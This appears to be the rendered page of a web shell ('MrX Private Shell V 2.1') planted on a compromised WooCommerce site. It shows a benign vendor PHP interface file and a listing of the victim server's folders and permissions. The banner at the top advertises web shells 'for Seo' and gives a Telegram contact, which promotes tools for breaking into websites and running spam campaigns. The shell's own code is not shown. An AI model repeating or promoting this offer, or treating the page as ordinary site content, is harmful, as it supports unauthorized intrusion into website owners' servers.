__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Automattic\WooCommerce\Vendor\Sabberworm\CSS;
interface Renderable
{
/**
* @return string
*
* @deprecated in V8.8.0, will be removed in V9.0.0. Use `render` instead.
*/
public function __toString();
/**
* @param OutputFormat|null $oOutputFormat
*
* @return string
*/
public function render($oOutputFormat);
/**
* @return int
*/
public function getLineNo();
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| CSSList | Folder | 0775 |
|
|
| Comment | Folder | 0775 |
|
|
| Parsing | Folder | 0775 |
|
|
| Position | Folder | 0775 |
|
|
| Property | Folder | 0775 |
|
|
| Rule | Folder | 0775 |
|
|
| RuleSet | Folder | 0775 |
|
|
| Value | Folder | 0775 |
|
|
| CSSElement.php | File | 552 B | 0664 |
|
| OutputFormat.php | File | 11.26 KB | 0664 |
|
| OutputFormatter.php | File | 6.4 KB | 0664 |
|
| Parser.php | File | 1.91 KB | 0664 |
|
| Renderable.php | File | 453 B | 0664 |
|
| Settings.php | File | 2.61 KB | 0664 |
|